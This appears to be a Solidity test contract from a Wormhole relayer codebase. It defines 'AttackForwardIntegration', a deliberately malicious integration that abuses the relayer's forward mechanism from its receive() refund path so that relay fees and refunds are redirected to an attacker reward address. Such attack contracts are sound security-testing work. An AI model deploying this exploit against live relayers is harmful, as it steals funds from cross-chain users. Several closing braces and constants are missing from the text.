
75 lines
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// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.17;
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import "../interfaces/IWormhole.sol";
import "../interfaces/IWormholeReceiver.sol";
import "../interfaces/IWormholeRelayer.sol";
* This contract is a malicious "integration" that attempts to attack the forward mechanism.
contract AttackForwardIntegration is IWormholeReceiver {
mapping(bytes32 => bool) consumedMessages;
address attackerReward;
IWormhole wormhole;
IWormholeRelayer core_relayer;
uint32 nonce = 1;
uint16 targetChainId;
// Capture 30k gas for fees
// This just needs to be enough to pay for the call to the destination address.
constructor(IWormhole initWormhole, IWormholeRelayer initCoreRelayer, uint16 chainId, address initAttackerReward) {
attackerReward = initAttackerReward;
wormhole = initWormhole;
core_relayer = initCoreRelayer;
targetChainId = chainId;
// This is the function which receives all messages from the remote contracts.
function receiveWormholeMessages(IWormholeReceiver.DeliveryData memory deliveryData, bytes[] memory vaas)
// Do nothing. The attacker doesn't care about this message; he sends it himself.
receive() external payable {
// Request forward from the relayer network
// The core relayer could in principle accept the request due to this being the target of the message at the same time as being the refund address.
// Note that, if succesful, this forward request would be processed after the time for processing forwards is past.
// Thus, the request would "linger" in the forward request cache and be attended to in the next delivery.
forward(targetChainId, toWormholeFormat(attackerReward));
function forward(uint16 targetChain, bytes32 attackerRewardAddress) internal {
uint256 maxTransactionFee =
core_relayer.quoteGas(targetChain, SAFE_DELIVERY_GAS_CAPTURE, core_relayer.getDefaultRelayProvider());
bytes memory emptyArray;
IWormholeRelayer.Send memory request = IWormholeRelayer.Send({
targetChain: targetChain,
targetAddress: attackerRewardAddress,
refundChain: targetChain,
// All remaining funds will be returned to the attacker
refundAddress: attackerRewardAddress,
maxTransactionFee: maxTransactionFee,
receiverValue: 0,
payload: emptyArray,
relayParameters: core_relayer.getDefaultRelayParams()
core_relayer.forward{value: maxTransactionFee}(
request, new IWormholeRelayer.MessageInfo[](0), core_relayer.getDefaultRelayProvider()
function toWormholeFormat(address addr) public pure returns (bytes32 whFormat) {
return bytes32(uint256(uint160(addr)));